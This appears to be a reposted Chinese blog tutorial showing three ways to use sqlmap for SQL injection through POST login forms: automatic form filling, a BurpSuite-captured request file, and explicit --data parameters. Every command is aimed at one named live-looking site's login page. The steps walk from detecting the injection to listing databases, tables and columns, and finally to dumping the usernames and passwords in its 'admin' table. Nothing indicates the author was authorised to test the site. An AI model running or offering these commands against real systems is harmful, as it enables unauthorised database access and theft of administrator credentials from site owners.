mysql post 注入工具_Sqlmap POST注入 三种方法(转载)

不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!

一、自动填写表单

自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:

1、判断是否有post注入?

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms

出来的提示,一路回车就可以了!

结果如下图:

5b6c01490d4a0c73d804fe43bed42bce.png

从这里,可以得到数据库是:Microsoft SQL Server,也就是mssql;

总之,一句话总结即可!IIS+ASP+windows+mssql;

这里重点说一下,Sql Server(mssql)数据库类似于mysql,数据库结构如下:

数据库A -> 表名 -> 列名 -> 数据

数据库B -> 表名 -> 列名 -> 数据

因此:mssql注入和mysql注入其实都差不多。

2、查找数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --dbs

c9ff1c15cda4530f689a4c8509a29245.png

注意:如果遇到数据库非常多,而且我们也不知道管理用户名和密码存放在哪个数据库中?又应该怎么办呢?

查找当前的数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms --current-db

后面就不截图了,都很简单,这里找到了当前数据库是“vip_0730"。

3、查找表名

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 --tables

4、查找列名

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730 -T admin --columns

5、爆出数据

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms -D vip_0730-T admin-C user_name,user_pwd--dump

从这里就可以爆出 vip_0730 数据库 中 admin 表的 user_name 和 user_pwd 列的数据了。

二、Sqlmap结合BurpSuite

这是Sqlmap工具POST注入的第二种方法;这种方法要比自动填写表单准确性高些,但是:自动表单会简单快一点。具体步骤如下:

1、抓包

2、全选抓包的数据,右键 -> Copy 就可以保存到 1.txt 文档中;

5fa6dca757e2a61dd220edbc1bbd1939.png

3、sqlmap -r 指定文件

root@Kali:~# sqlmap -r '/home/1.txt'

4、查找当前数据库

root@Kali:~# sqlmap -r '/home/1.txt' --current-db

后面的这些和前面的就没什么区别了,就不继续讲重复的内容了。下面直接来说说Sqlmap POST注入第三种方法吧!

三、指定表单注入

指定表单注入是Sqlmap POST注入第三种方法,这个其实也需要抓包的。当然,不抓也可以,查看源代码等什么的也不是不可以,只是抓包比较精准而已。只要能知道指定的表单数据就可以了!

例如:我这里用指定表单注入,你只要能获取到“userid=aaa&passwd=bbbb”这个就可以了,不管你是用哪种途径获取到的都可以。

9f97668cd132118ccdedf58fa11ed3a2.png

1、检测是否有注入?

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb"

2、查找当前数据库

root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --data "userid=aaa&passwd=bbbb" --current-db

——————————————————————————————————————————————

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值